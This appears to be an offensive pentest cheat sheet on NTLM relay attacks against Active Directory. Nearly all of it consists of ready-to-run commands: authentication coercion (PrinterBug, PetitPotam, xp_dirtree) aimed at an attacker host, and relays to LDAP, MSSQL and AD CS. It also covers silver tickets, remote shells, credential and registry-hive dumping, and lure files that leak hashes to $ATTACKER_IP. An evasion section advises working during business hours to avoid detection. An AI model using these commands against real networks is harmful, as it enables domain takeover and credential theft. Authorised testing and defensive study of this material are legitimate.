NTLM Relay Attacks Comprehensive Guide¶

Overview¶

NTLM Relay Attack Fundamentals

NTLM relay is an Adversary-in-the-Middle (AiTM) attack exploiting the lack of mutual authentication in NTLM:

No Mutual Authentication: Clients cannot verify server legitimacy
Session Hijacking: Establish authenticated sessions using relayed credentials
Cross-Protocol Relay: Extract NTLM from one protocol, embed in another
No Password Required: Relay authentication without knowing credentials
Post-Relay Exploitation: Perform actions after establishing authenticated session

Authentication Coercion Techniques¶

PrinterBug (MS-RPRN)¶

PrinterBug Overview

Abuses Print Spooler service (MS-RPRN) to force authentication. Works on most Windows systems as Print Spooler is enabled by default.

Enumeration¶

# Check if Print Spooler is running
rpcclient -U "" -N $DC_IP -c "enumprinters"

# Check with crackmapexec
crackmapexec smb $TARGET_IP -u $USER -p $PASSWORD -M printerbug

Exploitation¶

# Basic SMB coercion
python3 printerbug.py $DOMAIN/$USER:'$PASSWORD'@$TARGET_IP $ATTACKER_IP

# With hash authentication
python3 printerbug.py $DOMAIN/$USER@$TARGET_IP $ATTACKER_IP -hashes :$NTHASH

# HTTP coercion (requires WebDAV)
python3 printerbug.py $DOMAIN/$USER:'$PASSWORD'@$TARGET_IP $ATTACKER_NAME@80/print

PetitPotam (MS-EFSR)¶

PetitPotam Overview

Exploits Encrypting File System Remote Protocol (MS-EFSR) for authentication coercion. More methods than PrinterBug but often requires authentication.

Exploitation¶

# Authenticated coercion
python3 PetitPotam.py -u $USER -p '$PASSWORD' -d $DOMAIN $ATTACKER_IP $TARGET_IP

# Unauthenticated (if vulnerable)
python3 PetitPotam.py $ATTACKER_IP $TARGET_IP

# HTTP coercion with WebDAV
python3 PetitPotam.py -u $USER -p '$PASSWORD' -d $DOMAIN $ATTACKER_NAME@80/files $TARGET_IP

Coercer (Multi-Protocol)¶

Coercer Overview

Comprehensive tool testing 17 different coercion methods across multiple protocols.

Exploitation¶

# Scan for vulnerable methods
python3 Coercer.py scan -t $TARGET_IP -u $USER -p '$PASSWORD' -d $DOMAIN -v

# Execute all coercion methods
python3 Coercer.py coerce -t $TARGET_IP -l $ATTACKER_IP -u $USER -p '$PASSWORD' -d $DOMAIN --always-continue

# HTTP coercion (Coercer v1.6+)
python3 Coercer.py -t $TARGET_IP -u $USER -p '$PASSWORD' -wh $ATTACKER_NAME -wp 80 -v

WebDAV Coercion¶

WebDAV Overview

Forces authentication over HTTP using WebClient service and searchConnector files.

Enable WebDAV¶

# Check WebDAV status
crackmapexec smb $TARGET_NETWORK -u $USER -p '$PASSWORD' -M webdav

# Deploy searchConnector to enable WebClient
cat > @search.searchConnector-ms << 'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
    <description>Microsoft Outlook</description>
    <isSearchOnlyItem>false</isSearchOnlyItem>
    <includeInStartMenuScope>true</includeInStartMenuScope>
    <templateInfo>
        <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
    </templateInfo>
    <simpleLocation>
        <url>https://$ATTACKER_IP/</url>
    </simpleLocation>
</searchConnectorDescription>
EOF

# Upload to share
smbclient //$TARGET_IP/$SHARE -U $USER%'$PASSWORD' -c "put @search.searchConnector-ms"

# Or use crackmapexec module
crackmapexec smb $TARGET_IP -u $USER -p '$PASSWORD' -M drop-sc \
  -o URL=https://$ATTACKER_IP/test SHARE=$SHARE FILENAME=@search

Trigger WebDAV Authentication¶

# From target machine (if you have RCE)
certutil -urlcache -f http://$ATTACKER_IP:8080/@test.searchConnector-ms @test.searchConnector-ms

# Or browse to share containing searchConnector file
# User navigates to \\$TARGET\$SHARE\ and WebClient activates

MSSQL Coercion¶

MSSQL xp_dirtree Overview

Force SQL Server to authenticate via SMB using directory traversal stored procedures.

Exploitation¶

-- Connect to MSSQL
mssqlclient.py $SQL_USER:'$SQL_PASSWORD'@$SQL_SERVER

-- Force SMB authentication
SQL> EXEC xp_dirtree '\\$ATTACKER_IP\share', 1, 1;

-- Alternative methods
SQL> EXEC xp_fileexist '\\$ATTACKER_IP\share\file.txt';
SQL> EXEC xp_subdirs '\\$ATTACKER_IP\share';

Cross-Protocol Relay Attacks¶

SMB to LDAP Relay¶

SMB → LDAP for Domain Escalation

Relay SMB authentication to LDAP for domain enumeration, user creation, or privilege escalation.

Prerequisites¶

SMB signing disabled on source
LDAP signing not enforced
Valid domain credentials for coercion

Exploitation¶

# Terminal 1: Start relay to LDAP
sudo ntlmrelayx.py -t ldap://$DC_IP -smb2support --no-da --no-acl --no-dump

# Domain enumeration (safe)
sudo ntlmrelayx.py -t ldap://$DC_IP -smb2support --no-da --no-acl --no-dump --lootdir ldap_dump

# Create computer account
sudo ntlmrelayx.py -t ldaps://$DC_IP -smb2support --add-computer 'EVIL$' 'Password123!' --no-dump --no-acl

# Escalate user privileges
sudo ntlmrelayx.py -t ldap://$DC_IP -smb2support --escalate-user '$USER' --no-dump

# Terminal 2: Trigger authentication
python3 printerbug.py $DOMAIN/$USER:'$PASSWORD'@$TARGET_IP $ATTACKER_IP

HTTP to LDAP Relay (Shadow Credentials)¶

HTTP → LDAP Shadow Credentials Attack

Relay HTTP authentication to LDAP to set shadow credentials for passwordless authentication.

Exploitation¶

# Terminal 1: Configure Responder (disable HTTP/SMB)
sed -i 's/HTTP = On/HTTP = Off/g' Responder.conf
sed -i 's/SMB = On/SMB = Off/g' Responder.conf

# Terminal 2: Start ntlmrelayx for shadow credentials
sudo ntlmrelayx.py -t ldap://$DC_IP --shadow-credentials --shadow-target $TARGET_USER --no-dump --no-acl

# Terminal 3: Start Responder
sudo python3 Responder.py -I $INTERFACE

# Terminal 4: Coerce HTTP authentication (if WebDAV enabled)
python3 printerbug.py $DOMAIN/$USER:'$PASSWORD'@$TARGET_IP $ATTACKER_NAME@80/print

# After successful relay, use the certificate
python3 gettgtpkinit.py -cert-pfx $TARGET_USER.pfx -pfx-pass $CERT_PASSWORD \
  $DOMAIN/$TARGET_USER $TARGET_USER.ccache

# Get NTLM hash
KRB5CCNAME=$TARGET_USER.ccache python3 getnthash.py -key $AS_REP_KEY $DOMAIN/$TARGET_USER

SMB to MSSQL Relay¶

SMB → MSSQL for Database Access

Relay SMB authentication to MSSQL for database access and command execution.

Exploitation¶

# Terminal 1: Start relay with SOCKS
sudo ntlmrelayx.py -t mssql://$SQL_SERVER -smb2support -socks

# Terminal 2: Trigger SMB authentication
python3 printerbug.py $DOMAIN/$USER:'$PASSWORD'@$TARGET_IP $ATTACKER_IP

# Terminal 3: Use SOCKS proxy
proxychains4 -q mssqlclient.py $DOMAIN/$USER@$SQL_SERVER -windows-auth -no-pass

# Execute commands if sysadmin
SQL> EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
SQL> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
SQL> EXEC xp_cmdshell 'whoami';

AD CS Relay Attacks (ESC8 & ESC11)¶

ESC8 - HTTP Relay to Web Enrollment¶

ESC8 Overview

Relay NTLM authentication to AD CS web enrollment endpoints to obtain certificates for machine accounts.

Enumeration¶

# Find AD CS servers
crackmapexec ldap $DC_NETWORK -u $USER -p '$PASSWORD' -M adcs

# List certificates and check for ESC8
certipy find -enabled -u $USER@$DC_IP -p '$PASSWORD' -stdout

# Check web enrollment accepts NTLM
curl -I http://$CA_SERVER/certsrv/
# Look for: WWW-Authenticate: NTLM

Exploitation Method 1: ntlmrelayx¶

# Terminal 1: Setup relay to web enrollment
sudo ntlmrelayx.py -t http://$CA_SERVER/certsrv/certfnsh.asp \
  -smb2support --adcs --template Machine

# Terminal 2: Coerce authentication
python3 printerbug.py $DOMAIN/$USER:'$PASSWORD'@$TARGET_COMPUTER $ATTACKER_IP

# Process the base64 certificate
echo -n "$BASE64_CERT" | base64 -d > $TARGET_COMPUTER.pfx

# Request TGT using certificate
python3 gettgtpkinit.py -dc-ip $DC_IP -cert-pfx $TARGET_COMPUTER.pfx \
  $DOMAIN/$TARGET_COMPUTER$ $TARGET_COMPUTER.ccache
# Note the AS-REP encryption key

# Extract NT hash from TGT
KRB5CCNAME=$TARGET_COMPUTER.ccache python3 getnthash.py \
  $DOMAIN/$TARGET_COMPUTER$ -key $AS_REP_KEY

Exploitation Method 2: Certipy (Simplified)¶

# Terminal 1: Setup relay (as root)
sudo certipy relay -target "http://$CA_SERVER" -template Machine

# Terminal 2: Coerce authentication
python3 printerbug.py $DOMAIN/$USER:'$PASSWORD'@$TARGET_COMPUTER $ATTACKER_IP

# Extract NT hash directly
certipy auth -pfx $TARGET_COMPUTER.pfx -dc-ip $DC_IP
# Output: aad3b435b51404eeaad3b435b51404ee:$NT_HASH

Post-Exploitation: Silver Ticket Attack¶

# Get domain SID
lookupsid.py $DOMAIN/$TARGET_COMPUTER$@$DC_IP -hashes :$NT_HASH
# Example: S-1-5-21-1207890233-375443991-2397730614

# Forge silver ticket for Administrator
ticketer.py -nthash $NT_HASH \
  -domain-sid $DOMAIN_SID \
  -domain $DOMAIN_FQDN \
  -spn cifs/$TARGET_COMPUTER.$DOMAIN_FQDN Administrator

# Use ticket to access target
KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass $TARGET_COMPUTER.$DOMAIN_FQDN

# Get flag or perform actions
C:\> type C:\Users\Administrator\Desktop\flag.txt

ESC11 - RPC Relay to ICPR Endpoints¶

ESC11 Overview

Exploits ICertPassage Remote Protocol when encryption is not enforced, allowing relay over RPC.

Enumeration¶

# Check for ESC11 vulnerability
certipy find -enabled -u $USER@$DC_IP -p '$PASSWORD' -stdout
# Look for: "ESC11: Encryption is not enforced for ICPR requests"

Exploitation¶

# Terminal 1: Setup relay to RPC/ICPR endpoint
sudo certipy relay -target "rpc://$CA_SERVER" -ca "$CA_NAME"

# Terminal 2: Coerce authentication
python3 printerbug.py $DOMAIN/$USER:'$PASSWORD'@$TARGET_COMPUTER $ATTACKER_IP

# Extract NT hash from certificate
certipy auth -pfx $TARGET_COMPUTER.pfx -dc-ip $DC_IP

# Continue with silver ticket attack (same as ESC8)

Resource-Based Constrained Delegation (RBCD)¶

Overview¶

RBCD Attack Fundamentals

Abuse computer account creation and delegation to compromise high-value targets.

RBCD Attack Chain¶

# Check MachineAccountQuota
crackmapexec ldap $DC_IP -u $USER -p '$PASSWORD' -M maq

# Method 1: Create computer account via relay
# Terminal 1: Start relay
sudo ntlmrelayx.py -t ldaps://$DC_IP --add-computer 'EVIL$' 'Password123!' --no-dump

# Terminal 2: Trigger authentication
python3 printerbug.py $DOMAIN/$USER:'$PASSWORD'@$TARGET $ATTACKER_IP

# Method 2: Direct creation (if MAQ > 0)
impacket-addcomputer -dc-ip $DC_IP -computer-name 'EVIL$' \
  -computer-pass 'Password123!' $DOMAIN/$USER:'$PASSWORD'

# Configure RBCD
impacket-rbcd $DOMAIN/$USER:'$PASSWORD' -delegate-to '$TARGET_COMPUTER$' \
  -delegate-from 'EVIL$' -action write -dc-ip $DC_IP

# Request service ticket
impacket-getST -spn cifs/$TARGET_COMPUTER.$DOMAIN -impersonate Administrator \
  -dc-ip $DC_IP $DOMAIN/'EVIL$':'Password123!'

# Use ticket
export KRB5CCNAME=Administrator.ccache
impacket-psexec -k -no-pass $TARGET_COMPUTER.$DOMAIN

SOCKS Proxy Relay¶

Overview¶

SOCKS Proxy Benefits

Maintain authenticated sessions indefinitely for multiple attacks without re-exploitation.

SOCKS Configuration¶

# Terminal 1: Start relay with SOCKS
sudo ntlmrelayx.py -tf targets.txt -smb2support -socks

# Terminal 2: Configure proxychains
echo "socks4 127.0.0.1 1080" >> /etc/proxychains4.conf

# Terminal 3: Trigger authentication
python3 printerbug.py $DOMAIN/$USER:'$PASSWORD'@$TARGET $ATTACKER_IP

# Terminal 4: Use authenticated sessions
# Check active sessions
ntlmrelayx> socks

# Use sessions through proxychains
proxychains4 -q smbexec.py $DOMAIN/$USER@$TARGET -no-pass
proxychains4 -q mssqlclient.py $DOMAIN/$USER@$SQL_SERVER -windows-auth -no-pass
proxychains4 -q secretsdump.py $DOMAIN/$USER@$TARGET -no-pass

Responder Poisoning¶

Overview¶

LLMNR/NBT-NS/mDNS Poisoning

Poison name resolution protocols to capture authentication attempts.

Poisoning Attacks¶

# Analyze mode (reconnaissance)
sudo python3 Responder.py -I $INTERFACE -A

# Full poisoning mode
sudo python3 Responder.py -I $INTERFACE

# Poisoning with relay (disable SMB/HTTP)
sed -i 's/SMB = On/SMB = Off/g' Responder.conf
sed -i 's/HTTP = On/HTTP = Off/g' Responder.conf
sudo python3 Responder.py -I $INTERFACE

# Start relay in another terminal
sudo ntlmrelayx.py -t ldap://$DC_IP -smb2support --escalate-user $USER

Hash Farming Techniques¶

Malicious File Deployment

Deploy files that trigger authentication when accessed.

Create Malicious Files¶

# Generate all file types
python3 ntlm_theft.py -g all -s $ATTACKER_IP -f '@capture'

# Create custom .lnk file
$WshShell = New-Object -ComObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut("@capture.lnk")
$Shortcut.TargetPath = "\\$ATTACKER_IP\share"
$Shortcut.IconLocation = "\\$ATTACKER_IP\icon"
$Shortcut.Save()

# Create .url file
cat > @capture.url << EOF
[InternetShortcut]
URL=file://$ATTACKER_IP/share
IconFile=\\$ATTACKER_IP\icon.ico
IconIndex=0
EOF

# Create .scf file
cat > @capture.scf << EOF
[Shell]
Command=2
IconFile=\\$ATTACKER_IP\share\icon.ico
[Taskbar]
Command=ToggleDesktop
EOF

Deploy to Shares¶

# Find writable shares
crackmapexec smb $TARGET_NETWORK -u $USER -p '$PASSWORD' --shares -M write_test

# Upload malicious files
smbclient //$TARGET_IP/$SHARE -U $USER%'$PASSWORD' \
  -c "put @capture.lnk; put @capture.url; put @capture.scf"

# Monitor for captures
sudo responder -I $INTERFACE -v

Tool Configuration¶

Required Tools Installation¶

# Responder
git clone https://github.com/lgandx/Responder

# Impacket suite
git clone https://github.com/fortra/impacket
cd impacket && pip3 install .

# Certipy
pip3 install certipy-ad

# PKINITtools
git clone https://github.com/dirkjanm/PKINITtools

# Coercer
git clone https://github.com/p0dalirius/Coercer

# PetitPotam
git clone https://github.com/topotam/PetitPotam

# PrinterBug
wget https://raw.githubusercontent.com/dirkjanm/krbrelayx/master/printerbug.py

# ntlm_theft
git clone https://github.com/Greenwolf/ntlm_theft

Attack Decision Matrix¶

Quick Attack Selection Guide

Source Protocol	Target Service	Attack Type	Requirements	Impact
SMB	SMB	Direct Relay	No signing	System access
SMB	LDAP	Privilege Escalation	No LDAP signing	Domain escalation
HTTP	LDAP	Shadow Credentials	WebDAV enabled	Persistence
SMB/HTTP	AD CS	ESC8/ESC11	Web enrollment	Certificate theft
SMB	MSSQL	Database Access	Windows auth	Data access
Any	Multiple	SOCKS Proxy	Valid relay	Session persistence

OPSEC Considerations¶

Detection Indicators

High-Risk Events:

Event 4624: Type 3 logons from same source
Event 4625: Multiple failed authentications
Event 4697: Service installation (Responder)
Event 4662: DCSync operations
Event 4886/4887: Certificate enrollment

Stealth Tips:

Use analyze mode before poisoning
Target specific hosts vs broadcast
Operate during business hours
Use SOCKS to minimize re-exploitation
Clean up created accounts

Complete Attack Walkthrough Example¶

Scenario: Compromise DC via AD CS Relay¶

# Step 1: Enumerate AD CS
certipy find -enabled -u $USER@$DC_IP -p '$PASSWORD' -stdout
# Found: ESC8 and ESC11 vulnerabilities

# Step 2: Setup relay (Terminal 1)
sudo certipy relay -target "http://$CA_SERVER" -template Machine

# Step 3: Coerce authentication (Terminal 2)
python3 printerbug.py $DOMAIN/$USER:'$PASSWORD'@$TARGET_COMPUTER $ATTACKER_IP

# Step 4: Process certificate
certipy auth -pfx $TARGET_COMPUTER.pfx -dc-ip $DC_IP
# Got hash: aad3b435b51404eeaad3b435b51404ee:$NT_HASH

# Step 5: Get domain SID
lookupsid.py $DOMAIN/$TARGET_COMPUTER$@$DC_IP -hashes :$NT_HASH
# Domain SID: S-1-5-21-XXXXXXXXX-XXXXXXXXX-XXXXXXXXX

# Step 6: Create silver ticket
ticketer.py -nthash $NT_HASH \
  -domain-sid $DOMAIN_SID \
  -domain $DOMAIN_FQDN \
  -spn cifs/$TARGET_COMPUTER.$DOMAIN_FQDN Administrator

# Step 7: Get shell
KRB5CCNAME=Administrator.ccache psexec.py -k -no-pass $TARGET_COMPUTER.$DOMAIN_FQDN

# Step 8: Dump domain
C:\> reg save HKLM\SYSTEM system.hive
C:\> reg save HKLM\SECURITY security.hive
C:\> reg save HKLM\SAM sam.hive

Best Practices¶

Attack Methodology

Enumerate First

Check SMB signing status
Identify AD CS configuration
Find WebDAV enabled hosts
Test coercion methods

Choose Attack Path

Prefer cross-protocol for bypassing restrictions
Use SOCKS for persistent access
Target high-value accounts

Execute Cleanly

Disable unnecessary Responder servers
Use targeted poisoning
Monitor for defensive responses

Maintain Access

Use shadow credentials for persistence
Keep SOCKS sessions active
Document all compromised systems

Pro Tips

Always check for WebDAV before HTTP coercion
Use SOCKS proxy to minimize detection
Combine relay with RBCD for flexibility
Target computer accounts for ESC8/ESC11
Monitor certificate enrollment logs
Use proxychains for all post-exploitation
Keep detailed logs for reporting
Test coercion methods in order of stealth
Clean up created accounts and certificates
Document the full attack chain

References¶

Additional Resources

NTLM Relay Attacks Comprehensive Guide¶

Overview¶

Authentication Coercion Techniques¶

PrinterBug (MS-RPRN)¶

Enumeration¶

Exploitation¶

PetitPotam (MS-EFSR)¶

Exploitation¶

Coercer (Multi-Protocol)¶

Exploitation¶

WebDAV Coercion¶

Enable WebDAV¶

Trigger WebDAV Authentication¶

MSSQL Coercion¶

Exploitation¶

Cross-Protocol Relay Attacks¶

SMB to LDAP Relay¶

Prerequisites¶

Exploitation¶

HTTP to LDAP Relay (Shadow Credentials)¶

Exploitation¶

SMB to MSSQL Relay¶

Exploitation¶

AD CS Relay Attacks (ESC8 & ESC11)¶

ESC8 - HTTP Relay to Web Enrollment¶

Enumeration¶

Exploitation Method 1: ntlmrelayx¶

Exploitation Method 2: Certipy (Simplified)¶

Post-Exploitation: Silver Ticket Attack¶

ESC11 - RPC Relay to ICPR Endpoints¶

Enumeration¶

Exploitation¶

Resource-Based Constrained Delegation (RBCD)¶

Overview¶

RBCD Attack Chain¶

SOCKS Proxy Relay¶

Overview¶

SOCKS Configuration¶

Responder Poisoning¶

Overview¶

Poisoning Attacks¶

Hash Farming Techniques¶

SMB Share Poisoning¶

Create Malicious Files¶

Deploy to Shares¶

Tool Configuration¶

Required Tools Installation¶

Attack Decision Matrix¶

OPSEC Considerations¶

Complete Attack Walkthrough Example¶

Scenario: Compromise DC via AD CS Relay¶

Best Practices¶

References¶